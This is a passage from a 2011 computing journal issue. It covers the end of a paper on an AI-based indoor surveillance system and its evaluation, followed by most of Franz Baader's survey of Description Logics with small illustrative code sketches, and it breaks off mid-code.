e.g., a small radius represents a low
speed. The triangles, on the other hand,
represent the direction of movement.
The location of a target on the mesh
represents the location in the physical
area. White colour depicts the lowest
frequency, black colour depicts the
highest frequency while the shades of
grey depict the frequencies in between.
The events that caused an alarm are
highlighted with a scale ranging from
green to red. For stationary events, tables are used instead of the targets. The
row of the table represents the posture
while the column represents the duration. A supervisor can read the graphical explanations quickly and effectively. The visualization is also used for
the general analysis of the behaviour
in the observed area.
4.4 Macro and Statistic Modules
Macro and Statistic modules analyse persons’ behaviour and trigger
alarms if it significantly deviates from
the usual behaviour. In order to do that,
several statistics about the movement
of each tagged person are collected,
calculated, and averaged over various
time periods. Afterwards, these statistics are compared to the previously
stored statistics of the same person and
the deviation factor is calculated. If it
exceeds the predefined bound, the
modules trigger an alarm.
The Statistic Module collects data
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
over time periods from one minute to
several hours regardless of person’s
location or context. On the other hand,
the Macro Module collects data regarding behaviour in certain areas (e.g.
room), i.e. the behaviour collection
starts when a person enters the area and
ends when he/she leaves it.
Both modules use behaviour attributes such as the percentage of time the person spent lying, sitting, standing, or walking during the observed time period, and the average walking speed. Additionally, the Macro Module uses the following attributes: area id, day of the week, length of stay, entrance time, and exit time.
The behaviours are classified with
the LOF algorithm [3], a density-based
kNN algorithm, which calculates the
local outlier factor of the tested instance with respect to the learning instances. The LOF algorithm was chosen based on the study [14]. Bias towards false positives or false negatives
can be adjusted by setting the alarm
threshold.
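The paper relies on the LOF algorithm [3]; purely as an illustration (scikit-learn is not mentioned in the paper, and the attribute values below are made up), a density-based outlier check over such behaviour attributes could look like this:

import numpy as np
from sklearn.neighbors import LocalOutlierFactor

# Rows: one observed time period; columns: behaviour attributes, e.g.
# [% lying, % sitting, % standing, % walking, average walking speed]
past_behaviour = np.array([
    [0.00, 0.70, 0.20, 0.10, 1.1],
    [0.00, 0.65, 0.25, 0.10, 1.0],
    [0.05, 0.60, 0.25, 0.10, 1.2],
    [0.00, 0.75, 0.15, 0.10, 0.9],
])

lof = LocalOutlierFactor(n_neighbors=3, novelty=True)
lof.fit(past_behaviour)

current = np.array([[0.60, 0.10, 0.10, 0.20, 2.5]])   # e.g. lying a lot, then running
if lof.predict(current)[0] == -1:                     # -1 marks an outlier
    print("deviation from usual behaviour -> trigger alarm")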
The modules show a graphical explanation for each alarm in form of
parallel coordinates plot. Each attribute
is represented with one of the parallel
vertical axes, while statistics about
given time periods are represented by
a zigzag line connecting values of each
attribute from the leftmost to the
rightmost one. Past behaviour is represented with green zigzag lines, while
the zigzag line pertaining to the behaviour that triggered the alarm is coloured red. The visualisation offers a
quick and simple way of establishing
the cause of alarm and often indicates
more specific reason for it.
5 Verification
Due to the complexity of the PDR
system and the diverse tasks that it performs it is difficult to verify its quality
with a single test or to summarize it in
a single number such as true positive
rate. Therefore, validation was done on
a more subjective and qualitative level, with several scenarios for each of the individual modules. Four demonstration videos of the PDR tests are available at <http://www.youtube.com/user/ijsdis>. A single test case, or scenario, is a sequence of actions and events including a security risk that should be detected by the system. "A person enters a room without permission" is an example of a scenario. Each scenario has a complementary pair: a similar sequence of actions which, on the contrary, must not trigger an alarm. "A person with permission enters the room" is the complementary scenario for the above example. The scenarios and their complements were carefully defined in cooperation with and under the supervision of security experts from the Slovenian Ministry of Defence.

Table 1: Evaluation of the PDR System.

Module          TP    TN    FP    FN     N
Expert Sys.    197   199     2     2   400
Video           30    30     0     0    60
Fuzzy Logic     47    42     8     3   100
Macro            9    10     1     0    20
Statistic        9    10     1     0    20
Total          292   291    12     5   600
Percentage (%) 48.7  48.5   2.0   0.8
The Expert System Module was
tested with two to three scenarios per
expert rule template. Each scenario was
performed ten times with various persons and objects. The module has perfect accuracy (no false positives and
no false negatives) in cases when the
RTLS noise was within the normal limits. When the noise was extremely
large, the system occasionally triggered
false alarms or overlooked security
risks. However, in those cases even
human experts were not able to tell if
the observed behaviour should trigger
an alarm or not based on the noisy
RTLS measurements alone. Furthermore, the extreme RTLS noise occurred in less than 2 % of the scenario
repetitions and the system made an error in less than 50 % of those cases.
The Video Module was tested using the following three scenarios: "a
person enters the area under surveillance without the RTLS tag", "a robot
is moving without authorised person’s
presence", and "a security camera is
intentionally obscured". Scenarios
were repeated ten times with different
people as actors. The module detected
the security risks in all of the scenario
repetitions with movement and distinguished between a human and a robot
perfectly. It failed to detect the obscured camera in one out of 10 repetitions. The module also did not trigger
any false alarms.
The Fuzzy Logic Module was tested with several scenarios, while the fuzzy knowledge was gathered over two weeks. The module successfully detected a person lying on the floor, sitting on a colleague's chair for a while, running in a room, walking on a table, crawling under a table, squeezing behind a wardrobe, standing on the same spot for an extended period of time, and similar unusual events. However, the experts' opinion was that some of the alarms should not have been triggered. Indeed, we expect that in more extensive tests the module's supervised learning capabilities would prevent further repetitions of unnecessary alarms.
The test of the Macro and Statistic
Modules included the simulation of a
usual day at work condensed into one
hour. The statistic time periods were 2
minutes long. Since the modules require a collection of persons’ past behaviour, two usual days of work were
recorded by a person, constituting
two hours of past behaviour data. Afterwards, the following activities were
performed 10 times by the same person and classified: performing a normal day of work, stealing a container
with classified data, acting agitated as
under the effect of drugs and running.
The classification accuracy was 90 %.
This was due to the low amount of past
behaviour data. Therefore, the modules
did not learn the usual behaviour of the
test person but only a condensed (simulated) behaviour in a limited learning
time. We expect that the classification
accuracy would be even higher if the learning time were extended and if the person acted as usual instead of simulating a condensed day of work.
The overall system performance
was tested on a single scenario: "stealing a container with classified documents". In the test five persons tried to
steal the container from a cabinet in a
small room under surveillance. Each
person tried to steal the container five
times with and without a tag. All the
attempts were successfully detected by
the system that reported the alarm and
provided an explanation for it.
The validation test data is summarized in Table 1. It gives the number of
true positive (TP), true negative (TN),
false positive (FP), and false negative
alarms (FN), and total number (N) of
scenario repetitions. Each row gives
the results for one of the five modules.
The bottom two rows give the total sum
for each column and the relative percentage.
The system received the award for
the best innovation among research
groups in Slovenia for 2009 at the Fourth
Slovenian Forum of Innovations.
6 Conclusion
This paper presents an intelligent
surveillance system utilizing a realtime location system (RTLS), video
cameras, and artificial intelligence
methods. It is designed for surveillance
of high security indoor environments
and is focused on internal security
threats. The data about movement of
personnel and important equipment is
gathered by RTLS and video cameras.
After basic pre-processing with filters
and primitive routines the data is sent
to the five independent software modules. Each of them is specialized for
detecting a specific security risk. The
Expert System Module detects suspicious situations that can be described
by location of a person or other tagged
objects in space and time. It detects
many different scenarios with high accuracy. The Video Module automatically detects movement of persons and
objects without tags, which is not allowed inside the surveillance area.
Fuzzy Logic, Macro, and Statistics
Modules automatically extract the
usual movement patterns of personnel
and equipment and detect deviations
from the usual behaviour. Fuzzy Logic
is focused on short-term anomalous behaviour such as entering an area for the
first time, lying on the ground or walking on the table. Macro and Statistic
Modules, on the other hand, are focused
on mid- and long-term behaviour such
as deviations in daily work routine.
The validation of the system shows
that it is able to detect all the security
scenarios it was designed for and that
it does not raise too many false alarms
even in more challenging situations. In
addition, the system is customizable
and can be used in a range of security
applications such as confidential data
archives and banks.
Acknowledgement
Research presented in this paper was
financed by the Republic of Slovenia, Ministry of Defence. We would like to thank
the colleagues from the Machine Vision Laboratory, Faculty of Electrical Engineering, University of Ljubljana, Slovenia, and
Spica International, d.o.o. for fruitful cooperation on the project. Thanks also to
Boštjan Kaluza, Mitja Lustrek, and Bogdan
Pogorelc for help regarding the RTLS and
discussions, and Anze Rode for discussions
about security systems, expert system rules
templates and specification of scenarios.
References
[1] G. R. Arce. "Nonlinear Signal Processing: A Statistical Approach", Wiley: New Jersey, USA, 2005.
[2] R. Bayer. "Symmetric Binary B-Trees: Data Structures and Maintenance Algorithms", Acta Informatica, 1, pp. 290–306, 1972.
[3] M. M. Breunig, H. P. Kriegel, R. T. Ng, J. Sander. "LOF: Identifying Density-Based Local Outliers", Proceedings of the International Conference on Management of Data – SIGMOD ’00, pp. 93–104, Dallas, Texas, 2000.
[4] J. Demsar, B. Zupan, G. Leban. "Orange: From Experimental Machine Learning to Interactive Data Mining", White Paper (www.ailab.si/orange), Faculty of Computer and Information Science, University of Ljubljana, Slovenia, 2004.
[5] M. Gams, T. Tusar. "Intelligent High-Security Access Control", Informatica, vol. 31(4), pp. 469–477, 2007.
[6] R. E. Kalman. "A New Approach to Linear Filtering and Prediction Problems", Journal of Basic Engineering, 82 (1), pp. 35–45, 1960.
[7] M. Kolbe, M. Gams. "Towards an Intelligent Biometric System for Access Control", Proceedings of the 9th International Multiconference Information Society – IS 2006, Ljubljana, Slovenia, 2006, pp. 118–122.
[8] B. Krausz, R. Herpers. "Event Detection for Video Surveillance Using an Expert System", Proceedings of the 1st ACM Workshop on Analysis and Retrieval of Events/Actions and Workflows in Video Streams – AREA 2008, Vancouver, Canada, pp. 49–56.
[9] M. Kristan, J. Pers, M. Perse, S. Kovačič. "Closed-World Tracking of Multiple Interacting Targets for Indoor-Sports Applications", Computer Vision and Image Understanding, vol. 113, no. 5, pp. 598–611, 2009.
[10] M. Perše, M. Kristan, S. Kovačič, G. Vučković, J. Pers. "A Trajectory-Based Analysis of Coordinated Team Activity in a Basketball Game", Computer Vision and Image Understanding, vol. 113, no. 5, pp. 612–621, 2009.
[11] R. Piltaver, M. Gams. "Expert System as a Part of Intelligent Surveillance System", Proceedings of the 18th International Electrotechnical and Computer Science Conference – ERK 2009, vol. B, pp. 191–194, 2009.
[12] R. Piltaver. "Strojno učenje pri načrtovanju algoritmov za razpoznavanje tipov gibanja", Proceedings of the 11th International Multiconference Information Society – IS 2008, pp. 13–17, 2008.
[13] V. Schwarz, A. Huber, M. Tüchler. "Accuracy of a Commercial UWB 3D Location Tracking System and its Impact on LT Application Scenarios", Proceedings of the IEEE International Conference on Ultra-Wideband, Zürich, Switzerland, 2005.
[14] T. Tusar, M. Gams. "Odkrivanje izjem na primeru inteligentnega sistema za kontrolo pristopa", Proceedings of the 9th International Multiconference Information Society – IS 2006, Ljubljana, Slovenia, 2006, pp. 136–139.
[15] Ubisense: available at <http://www.ubisense.net/>.
[16] I. H. Witten, E. Frank. "Data Mining: Practical Machine Learning Tools and Techniques" (2nd edition), Morgan Kaufmann, 2005.
[17] L. A. Zadeh. "Fuzzy Sets", Information and Control, 8 (3), pp. 338–353, 1965.
[18] <http://www.pervcomconsulting.com/secure.html>
[19] <http://www.visonictech.com/Active-RFID-RTLS-Tracking-andMangement-Software-Eiris.html>
[20] <http://www.aeroscout.com/content/healthcare>
[21] <http://www.telargo.com/solutions/track_trace.asp>
UPENET
Knowledge Representation
What’s New in Description Logics
Franz Baader
© 2011 Informatik Spektrum
This paper was first published, in English, by Informatik-Spektrum (Volume 34, issue no. 5, October 2011, pp. 434-442). Informatik-Spektrum (<http://www.springerlink.com/content/1432-122X/>), a UPENET partner, is a journal published, in German or English, by Springer Verlag on behalf of the German CEPIS society GI (Gesellschaft für Informatik, <http://www.gi-ev.de/>) and the Swiss CEPIS society SI (Schweizer Informatiker Gesellschaft – Société Suisse des Informaticiens, <http://www.s-i.ch/>).
Mainstream research in Description Logics (DLs) until recently concentrated on increasing the expressive power of the employed description language while keeping standard inference problems like subsumption and instance checking manageable, in the sense that highly optimized reasoning procedures for them behave well in practice. One of the main successes of this line of research was the adoption of OWL DL, which is based on an expressive DL, as the standard ontology language for the Semantic Web. More recently, there has been a growing interest in more light-weight DLs, and in other kinds of inference problems, mainly triggered by the needs of applications with large-scale ontologies. In this paper, we first review the DL research leading to the very expressive DLs with practical inference procedures underlying OWL, and then sketch the recent development of light-weight DLs and novel inference procedures.
Keywords: Description Logics, Logic-based Knowledge Representation Formalism, Ontology Languages,
OWL, Practical Reasoning Tools.
1 Mainstream DL research of the last 25 years:
towards very expressive DLs with practical inference procedures
Description Logics [BCNMP03] are a well-investigated family of logic-based knowledge representation
formalisms, which can be used to represent the conceptual knowledge of an application domain in a structured
and formally well-understood way. They are employed
in various application domains, such as natural language
processing, configuration, and databases, but their most
notable success so far is the adoption of the DL-based
language OWL 1 as standard ontology language for the
Semantic Web [HoPH03].
Author

Franz Baader is Full Professor for Theoretical Computer Science at TU Dresden, Germany. He obtained his PhD in Computer Science at the University of Erlangen, Germany. He was a Senior Researcher at the German Research Institute for Artificial Intelligence (DFKI) for four years, and an Associate Professor at RWTH Aachen, Germany, for eight years. His main research area is Logic in Computer Science, in particular knowledge representation (description logics, modal logics, nonmonotonic logics) and automated deduction (term rewriting, unification theory, combination of decision procedures). <[email protected]>

1 <http://www.w3.org/TR/owl-features/>.

The name Description Logics is motivated by the fact that, on the one hand, the important notions of the domain are described by concept descriptions, i.e., expressions that are built from atomic concepts (unary predicates) and atomic roles (binary predicates) using concept constructors. The expressivity of a particular DL is determined by which concept constructors are available in it. From a semantic point of view, concept names and concept descriptions represent sets of individuals, whereas roles represent binary relations between individuals. For example, using the concept names Man, Doctor, and Happy and the role names married and child, the concept of "a man that is married to a doctor, and has only happy children" can be expressed using the concept description

Man ⊓ ∃married.Doctor ⊓ ∀child.Happy
On the other hand, DLs differ from their predecessors in that they are equipped with a formal, logic-based
semantics, which can, e.g., be given by a translation into first-order predicate logic. For example, the above concept description can be translated into the following first-order formula (with one free variable x):

Man(x) ∧ ∃y.(married(x,y) ∧ Doctor(y)) ∧ ∀y.(child(x,y) → Happy(y))
The motivation for introducing the early predecessors of DLs, such as semantic networks and
frames [Quil67, Mins81], actually was to develop means of representation that are closer to the
way humans represent knowledge than a representation in formal logics, like first-order predicate
logic. Minsky [Mins81] even combined his introduction of the frame idea with a general rejection
of logic as an appropriate formalism for representing knowledge. However, once people tried to
equip these "formalisms" with a formal semantics, it turned out that they can be seen as syntactic
variants of (subclasses of) first-order predicate logic [Haye79, ScGC79]. Description Logics were
developed with the intention of keeping the advantages of the logic-based approach to knowledge
representation (like a formal model-theoretic semantics and well-defined inference problems), while
avoiding the disadvantages of using full first-order predicate logic (e.g., by using a variable-free
syntax that is easier to read, and by ensuring decidability of the important inference problems).
Concept descriptions can be used to define the terminology of the application domain, and to
make statements about a specific application situation in the assertional part of the knowledge
base. In its simplest form, a DL terminology (usually called TBox) can be used to introduce abbreviations for complex concept descriptions. For example, the concept definitions

Woman ≡ Human ⊓ Female,  Man ≡ Human ⊓ ¬Female,  Father ≡ Man ⊓ ∃child.⊤

define the concept of a man (woman) as a human that is not female (is female), and the concept of a father as a man that has a child, where ⊤ stands for the top concept (which is interpreted as the
universe of all individuals in the application domain). The above is a (very simple) example of an
acyclic TBox, which is a finite set of concept definitions that is unambiguous (i.e., every concept
name appears at most once on the left-hand side of a definition) and acyclic (i.e., there are no cyclic
dependencies between definitions). In general TBoxes, so-called general concept inclusions (GCIs)
can be used to state additional constraints on the interpretation of concepts and roles. In our example, it makes sense to state domain and range restrictions for the role child. The GCIs

∃child.Human ⊑ Human  and  Human ⊑ ∀child.Human

say that only human beings can have human children, and that the child of a human being must
be human.
In the assertional part (ABox) of a DL knowledge base, facts about a specific application situation can be stated by introducing named individuals and relating them to concepts and roles. For
example, the assertions

Man(JOHN),  child(JOHN, MACKENZIE),  Female(MACKENZIE)

state that John is a man, who has the female child Mackenzie.
Knowledge representation systems based on DLs provide their users with various inference
services that allow them to deduce implicit knowledge from the explicitly represented knowledge.
For instance, the subsumption algorithm allows one to determine subconcept-superconcept relationships. For example, w.r.t. the concept definitions from above, the concept Human subsumes the concept
Father since all instances of the second concept are necessarily instances of the first concept, i.e.,
whenever the above concept definitions are satisfied, then Father is interpreted as a subset of Human. With the help of the subsumption algorithm, one can compute the hierarchy of all concepts
defined in a TBox. This inference service is usually called classification. The instance algorithm
can be used to check whether an individual occurring in an ABox is necessarily an instance of a
given concept. For example, w.r.t. the above assertions, concept definitions, and GCIs, the individual MACKENZIE is an instance of the concept Human. With the help of the instance algorithm,
one can compute answers to instance queries, i.e., all individuals occurring in the ABox that are
instances of the query concept C.
In order to ensure a reasonable and predictable behavior of a DL system, the underlying inference problems (like the subsumption and the instance problem) should at least be decidable for the
DL employed by the system, and preferably of low complexity. Consequently, the expressive power
of the DL in question must be restricted in an appropriate way. If the imposed restrictions are too
severe, however, then the important notions of the application domain can no longer be specified using concept
descriptions. Investigating this trade-off between the
expressivity of DLs and the complexity of their inference problems has been one of the most important issues
in DL research.
The general opinion on the (worst-case) complexity
that is acceptable for a DL has changed dramatically over
time. Historically, in the early times of DL research people have concentrated on identifying formalisms for
which reasoning is tractable, i.e. can be performed in
polynomial time [Pate84]. The precursor of all DL systems, KL-ONE [BrSc85], as well as its early successor
systems, like KANDOR [Pate84], K-REP [MaDW91],
and BACK [Pelt91], indeed employed polynomial-time
subsumption algorithms. Later on, however, it turned out
that subsumption in rather inexpressive DLs may be intractable [LeBr87], that subsumption in KL-ONE is even
undecidable [Schm89], and that even for systems like
KANDOR and BACK, for which the expressiveness of
the underlying DL had been carefully restricted with the
goal of retaining tractability, the subsumption problem
is in fact intractable [Nebe88]. The reason for the discrepancy between the complexity of the subsumption algorithms employed in the above-mentioned early DL systems and the worst-case complexity of the subsumption
problems these algorithms were supposed to solve was
due to the fact that these systems employed sound, but
incomplete subsumption algorithms, i.e., algorithms
whose positive answers to subsumption queries are correct, but whose negative answers may be incorrect. The
use of incomplete algorithms has since then largely been
abandoned in the DL community, mainly because of the
problem that the behavior of the systems is no longer
determined by the semantics of the description language:
an incomplete algorithm may claim that a subsumption
relationship does not hold, although it should hold according to the semantics. All the intractability results
mentioned above already hold for subsumption between
concept descriptions without a TBox. An even worse blow
to the quest for a practically useful DL with a sound,
complete, and polynomial-time subsumption algorithm
was Nebel’s result [Nebe90] that subsumption w.r.t. an
acyclic TBox (i.e., an unambiguous set of concept definitions without cyclic dependencies) in a DL with conjunction and value restriction is already intractable.2
At about the time when these (negative) complexity
results were obtained, a new approach for solving inference problems in DLs, such as the subsumption and the
instance problem, was introduced. This so-called tableau-
2 All the systems mentioned above supported these two concept constructors, which were at that time viewed as being indispensable for a DL. The DL with exactly these two concept constructors is called FL0 [Baad90c].
3
<http://www.w3.org/TR/2009/REC-owl2-overview-20091027/>.
based approach was first introduced in the context of
DLs by Schmidt-Schauß [Schm89] and Smolka [ScSm91],
though it had already been used for modal logics long
before that [Fitt72]. It has turned out that this approach
can be used to handle a great variety of different DLs
(see [BaSa01] for an overview and, e.g., [HoSa05,
HoKS06, LuMi07] for more recent results), and it yields
sound and complete inference algorithms also for very
expressive DLs. Although the worst-case complexity of
these algorithms is quite high, the tableau-based approach
nevertheless often yields practical procedures: optimized
implementations of such procedures have turned out to
behave quite well in applications [BFHN*94, Horr03,
HaMo08], even for expressive DLs with a high worst-case complexity (ExpTime and beyond). The advent of
tableau-based algorithms was the main reason why the
DL community basically abandoned the search for DLs
with tractable inference problems, and concentrated on
the design of practical tableau-based algorithms for expressive DLs. The most prominent modern DL systems,
FaCT++ [TSHo06], Racer [HaMo01b], and Pellet
[SiPa04] support very expressive DLs and employ highly optimized tableau-based algorithms. In addition to the
fact that DLs are equipped with a well-defined formal
semantics, the availability of mature systems that support sound and complete reasoning in very expressive
description formalisms was an important argument in
favor of using DLs as the foundation of OWL, the standard ontology language for the Semantic Web. In fact,
OWL DL is based on the expressive DL SHOIN(D), for which reasoning is NExpTime-complete in the worst case [HoPa04].
The research on how to extend the expressive power of DLs has actually not stopped with the adoption of SHOIN(D) as the DL underlying OWL. In fact, the new version of the OWL standard, OWL 2,3 is based on the even more expressive DL SROIQ(D), which is 2NExpTime-complete [Kaza08]. The main new features of SROIQ(D) are the use of qualified number restrictions (≥ n r.C) rather than simple number restrictions (≥ n r), and the availability of (a restricted form of) role inclusion axioms. For example, with a simple number restriction we can describe the concept of a man that has three children,

Man ⊓ (≥ 3 child),

but we cannot specify properties of these children, as in the qualified number restriction

Man ⊓ (≥ 3 child.Happy).
2 More recent developments: Light-weight DLs
and the need for novel inference tools
In this section, we first discuss the EL and the DL-Lite families of light-weight DLs, and then consider inference problems different from the subsumption and the instance problem.
Light-weight DLs: the EL family
The ever increasing expressive power and worst-case
complexity of expressive DLs, combined with the increased use of DL-based ontology languages in practical
applications due to the OWL standard, has also resulted
in an increasing number of ontologies that cannot be handled by tableau-based reasoning systems without manual
tuning by the system developers, despite highly optimized
implementations. Perhaps the most prominent example
is the well-known medical ontology SNOMED CT4,
which comprises 380,000 concepts and is used as a standardized health care terminology in a variety of countries
such as the US, Canada, and Australia. In tests performed
in 2005 with FaCT++ and Racer, neither of the two systems could classify SNOMED CT [BaLS05]5, and Pellet
still could not classify SNOMED CT in tests performed
in 2008 [Meng09].
From the DL point of view, SNOMED CT is an acyclic TBox that contains only the concept constructors conjunction (⊓), existential restriction (∃r.C), and the top concept (⊤). The DL with exactly these three concept constructors is called EL [BaKM99]. In contrast to its counterpart with value restrictions, FL0, the light-weight DL EL has much better algorithmic properties. Whereas subsumption without a TBox is polynomial in both EL [BaKM99] and FL0 [LeBr87], subsumption in FL0 w.r.t. an acyclic TBox is coNP-complete [Nebe90] and w.r.t. GCIs it is even ExpTime-complete [BaBL05]. In contrast, subsumption in EL stays tractable even w.r.t. GCIs [Bran04], and this result is stable under the addition of several interesting means of expressivity [BaBL05, BaBL08].
4 <http://www.ihtsdo.org/snomed-ct/>.
5 Note, however, that more recent versions of FaCT++ and Racer perform quite well on SNOMED CT [Meng09], due to optimizations specifically tailored towards the classification of SNOMED CT.
Figure 1: The completion rules for subsumption in EL w.r.t. general TBoxes.
The polynomial-time subsumption algorithm for EL [Bran04, BaBL05] actually classifies the given TBox T, i.e., it simultaneously computes all subsumption relationships between the concept names occurring in T. This algorithm proceeds in four steps:
1. Normalize the TBox.
2. Translate the normalized TBox into a graph.
3. Complete the graph using completion rules.
4. Read off the subsumption relationships from the normalized graph.
An EL-TBox is normalized if it only contains GCIs of the following form:

A ⊑ B,  A1 ⊓ A2 ⊑ B,  A ⊑ ∃r.B,  ∃r.A ⊑ B,

where A, A1, A2, B are concept names or the top concept ⊤. Any EL-TBox can be transformed in polynomial time into a normalized one by applying equivalence-preserving normalization rules [Bran04]. In the next step, a classification graph is built, where
• V is the set of concept names (including ⊤) occurring in the normalized TBox T;
• S labels nodes with sets of concept names (again including ⊤);
• R labels edges with sets of role names.
The label sets are supposed to satisfy the following invariants:
• S(A) contains only subsumers of A w.r.t. T.
• R(A,B) contains only roles r such that ∃r.B subsumes A w.r.t. T.
Initially, we set S(A) = {A, ⊤} for all nodes A, and R(A,B) = ∅ for all edges (A,B). Obviously, the above invariants are satisfied by these initial label sets.
The labels of nodes and edges are then extended by applying the rules of Figure 1. Note that a rule is only applied if it really extends a label set. It is easy to see that these rules preserve the above invariants. The fact that subsumption in EL w.r.t. TBoxes can be decided in polynomial time is an immediate consequence of the facts that (i) rule application terminates after a polynomial number of steps, and (ii) if no more rules are applicable, then S(A) contains exactly those concept names B occurring in T that are subsumers of A w.r.t. T (see [Bran04, BaBL05] for more details and full proofs).
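Since Figure 1 itself is not reproduced in this transcription, the following sketch spells out the completion step using the standard formulation of the EL completion rules found in the literature; the tuple encoding of normalized axioms, the TOP constant, and the toy TBox are assumptions of the sketch and may differ in presentation from the figure.

```python
# Completion-rule sketch for classifying a normalized EL TBox.
# Normalized GCIs are encoded as tuples (assumption of this sketch):
#   ("sub",  A, B)      : A ⊑ B
#   ("conj", A1, A2, B) : A1 ⊓ A2 ⊑ B
#   ("ex_r", A, r, B)   : A ⊑ ∃r.B
#   ("ex_l", r, A, B)   : ∃r.A ⊑ B
TOP = "TOP"

def classify(tbox, concept_names):
    # concept_names must list every concept name occurring in the TBox
    names = set(concept_names) | {TOP}
    S = {A: {A, TOP} for A in names}                   # S(A): subsumers of A found so far
    R = {(A, B): set() for A in names for B in names}  # R(A,B): role labels of edge (A,B)
    changed = True
    while changed:                                     # apply rules until no label grows
        changed = False
        def add(label_set, value):
            nonlocal changed
            if value not in label_set:
                label_set.add(value)
                changed = True
        for A in names:
            for ax in tbox:
                if ax[0] == "sub" and ax[1] in S[A]:                       # A' ∈ S(A), A' ⊑ B
                    add(S[A], ax[2])
                elif ax[0] == "conj" and ax[1] in S[A] and ax[2] in S[A]:  # A1, A2 ∈ S(A)
                    add(S[A], ax[3])
                elif ax[0] == "ex_r" and ax[1] in S[A]:                    # A' ∈ S(A), A' ⊑ ∃r.B
                    add(R[(A, ax[3])], ax[2])
                elif ax[0] == "ex_l":                                      # r ∈ R(A,B1), A1 ∈ S(B1), ∃r.A1 ⊑ B
                    _, r, A1, B = ax
                    for B1 in names:
                        if r in R[(A, B1)] and A1 in S[B1]:
                            add(S[A], B)
    return S

# Toy normalized TBox: Father ⊑ Man, Man ⊑ Human,
# Father ⊑ ∃child.Human, ∃child.Human ⊑ Parent
tbox = [("sub", "Father", "Man"), ("sub", "Man", "Human"),
        ("ex_r", "Father", "child", "Human"), ("ex_l", "child", "Human", "Parent")]
print(classify(tbox, ["Father", "Man", "Human", "Parent"])["Father"])
# expected subsumers of Father: Father, TOP, Man, Human, Parent
```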
Light-weight DLs: the DL-Lite family
Another problematic issue with expressive DLs is that
query answering in such DLs does not scale too well to
knowledge bases with a very large ABox. In this context, queries are conjunctions of assertions that may also
contain variables, of which some can be existentially
quantified. For example, the query

q(x) = ∃y. Man(x) ∧ child(x, y) ∧ Woman(y)

asks for all men that have a child that is a woman6, but in general the use of variables allows the formulation of more complex queries than simple instance queries. In the database world, these kinds of queries are
called conjunctive queries [AbHV95]; the difference to
the pure database case is that, in addition to the instance
data, we also have a TBox. As an example, consider the
ABox assertions stating facts about John and Mackenzie
from the previous section. Without any additional information about the meaning of the predicates Man, child,
and Woman, the individual JOHN is not an answer to the
above query. However, if we take the concept definitions and GCIs introduced in the previous section into account, then JOHN turns out to be an answer to this query.
6 This simple query could also be expressed as an instance query using the concept description Man ⊓ ∃child.Woman, but in general the use of variables allows the formulation of more complex queries than simple instance queries.
Query answering in expressive DLs such as the already mentioned SHOIN (i.e., without concrete domains) is 2ExpTime-complete regarding combined complexity [Lutz08], i.e., the complexity w.r.t. the size of the TBox and the ABox. Thus, query answering in this logic is even harder than subsumption, while at the same time being much more time critical. Moreover, query answering in this logic is coNP-complete [OrCE08] regarding data complexity (i.e., in the size of the ABox), which is viewed as "unfeasible" in the database community. These hardness results for answering
conjunctive queries in expressive DLs are dramatic since
many DL applications, such as those that use ABoxes as
web repositories, involve ABoxes with hundreds of thousands of individuals. It is a commonly held opinion that,
in order to achieve truly scalable query answering in the
short term, it is essential to make use of conventional
relational database systems for query answering in DLs.
Given this proviso, the question is what expressivity a DL can offer such that queries can be answered using relational database technology while at the same time meaningful concepts can be specified in the TBox. As an answer to this, the DL-Lite family has been introduced in
[CGL+05, CDL+-KR06, CGL+07], designed to allow the
implementation of conjunctive query answering "on top
of" a relational database system.
DL-Litecore is the basic member of the DL-Lite family [CGL+07]. Concept descriptions of this DL are of the form A, ∃r, or ∃r⁻, where A is a concept name, r is a role name, and r⁻ denotes the inverse of the role name r. A DL-Litecore knowledge base (KB) consists of a TBox and an ABox. The TBox formalism allows for GCIs C ⊑ D and disjointness axioms disj(C, D) between DL-Litecore concept descriptions C, D, where disj(C, D) states that C and D must always be interpreted as disjoint sets. A DL-Litecore ABox is a finite set of concept and role assertions A(a) and r(a, b), where A is a concept name, r is a role name, and a, b are individual names.
In contrast to EL, DL-Lite cannot express qualified existential restrictions such as ∃child.Woman in the TBox. Conversely, EL does not have inverse roles, which
are available (albeit in a limited way) in DL-Lite.
In principle, query answering in DL-Lite can be realized as follows:
1. use the TBox to reformulate the given conjunctive query q into a first-order query, and then discard the TBox;
2. view the ABox as a relational database;
3. evaluate the reformulated query in the database using a relational query engine.
In practice, more work needs to be done to turn this into a scalable approach for query answering. For example, the queries generated by the reformulation step are very different from the SQL queries usually formulated by humans, and thus relational database engines are not optimized for such queries.
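As a toy illustration of this "rewrite, then use a relational engine" idea (and not of the actual rewriting algorithm of [CGL+07]), the following sketch handles only inclusions between concept names: every concept atom of the query is rewritten into the disjunction of its entailed subconcepts, and the resulting union of conjunctive queries is evaluated as SQL over an ABox stored in SQLite. All table, concept, and role names are our own.

```python
import itertools
import sqlite3

# TBox restricted to atomic inclusions  sub ⊑ sup  (assumption of this sketch)
TBOX = [("Father", "Man"), ("Man", "Human"), ("Woman", "Human")]

# ABox stored as a tiny relational database
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE concept_assertion(concept TEXT, ind TEXT);
    CREATE TABLE role_assertion(role TEXT, subj TEXT, obj TEXT);
    INSERT INTO concept_assertion VALUES ('Man', 'JOHN'), ('Woman', 'MACKENZIE');
    INSERT INTO role_assertion VALUES ('child', 'JOHN', 'MACKENZIE');
""")

def subconcepts(concept):
    """All concept names subsumed by `concept` (reflexive-transitive closure of the TBox)."""
    result, frontier = {concept}, {concept}
    while frontier:
        frontier = {sub for (sub, sup) in TBOX if sup in frontier} - result
        result |= frontier
    return result

def rewrite_and_answer(concept_atoms, role_atoms, answer_var):
    """concept_atoms: list of (Concept, var); role_atoms: list of (role, var, var).
    Rewrites each concept atom into its subconcepts and evaluates the resulting
    union of conjunctive queries as SQL."""
    sqls = []
    # one SQL query per choice of a subconcept for every concept atom
    for choice in itertools.product(*(subconcepts(c) for c, _ in concept_atoms)):
        tables, where, binding = [], [], {}
        for i, ((_, var), sub) in enumerate(zip(concept_atoms, choice)):
            tables.append(f"concept_assertion c{i}")
            where.append(f"c{i}.concept = '{sub}'")
            if var in binding:
                where.append(f"c{i}.ind = {binding[var]}")
            else:
                binding[var] = f"c{i}.ind"
        for j, (role, v1, v2) in enumerate(role_atoms):
            tables.append(f"role_assertion r{j}")
            where.append(f"r{j}.role = '{role}'")
            for v, col in ((v1, f"r{j}.subj"), (v2, f"r{j}.obj")):
                if v in binding:
                    where.append(f"{col} = {binding[v]}")
                else:
                    binding[v] = col
        sqls.append(f"SELECT {binding[answer_var]} FROM {', '.join(tables)} "
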